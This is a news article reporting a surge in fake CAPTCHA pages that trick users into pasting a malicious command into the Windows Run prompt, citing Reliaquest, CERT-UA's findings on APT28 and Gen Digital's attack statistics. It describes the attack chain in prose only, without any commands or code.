A new variant of social engineering attack using fake CAPTCHA pages to deceive victims has spiked in the last few months, security experts have warned.
Recent analysis from cyber specialists Reliaquest revealed criminals were leveraging fraudulent CAPTCHA pages that mimic trusted services like Google and Cloudflare to trick users into running malicious scripts on their machines.
Although the campaign was first spotted in September, Reliaquest noted that from October to early December 2024 its customers observed the number of fake CAPTCHA websites almost double when compared to the levels observed in September.
The firm speculated this was probably the result of threat actors sharing the templates for the fake webpages to other cyber criminals.
“This surge was likely the result of researchers releasing the templates used for these campaigns, which inadvertently provided more threat actors with the tools to easily replicate these tactics.”
The report noted sophisticated threat groups such as APT28 (Fancy Bear), which has ties to the Russian military, were using the technique, citing an investigation by Ukraine’s national cyber defense team on APT28’s use of fake CAPTCHA pages.
“A recent investigation by the Computer Emergency Response Team of Ukraine (CERT-UA) revealed APT28 had been using fake CAPTCHA systems to infiltrate local governments,” Reliaquest added.
“By mimicking reCAPTCHA interfaces, they tricked users into executing commands that downloaded harmful scripts. These scripts are capable of establishing Secure Shell (SSH) tunnels and exfiltrating data, highlighting the attack’s simplicity and potency.”
Evolution of fake CAPTCHA attacks presents ‘significant risk’
Reliaquest described the attack chain employed in these attacks as “deceptively simple”, whereby visitors to compromised websites are redirected to a fake CAPTCHA page.
But instead of the usual ‘click on the images of traffic crossings’ or retyping an obfuscated series of letters, the user is prompted to open a Run prompt and paste a command that is covertly copied to their clipboard on visiting the site.
This malicious command leads to the installation of malware, typically a credential stealer such as Lumma Stealer.
Security researchers have dubbed this approach, where victims execute the malicious commands themselves, as ‘Scam-Yourself’ attacks.
Security services provider Gen Digital said it detected a significant uplift in these types of attacks towards the end of 2024, recording a 614% spike quarter over quarter in Q3 2024, concluding “social engineering, psychological manipulation tactics continue to be one of the most dangerous tools in the cybercriminal arsenal.”
The report added it protected over 2 million users from the fake CAPTCHA variant of these ‘Scam-Yourself’ attacks in the same period.
Reliaquest warned hackers would continue to refine fake CAPTCHA attack techniques, making them harder to spot. The firm also predicted the addition of alternative execution methods would present a “significant risk” to organizations in the near future.
“Within the next three months, we anticipate enhancements in the fake CAPTCHA infection vector, such as employing alternative execution methods that do not use PowerShell commands,” it explained.
“This could involve using other LOLBins like forfiles.exe or certutil.exe to download the initial stage, aiming to circumvent existing detection measures.”
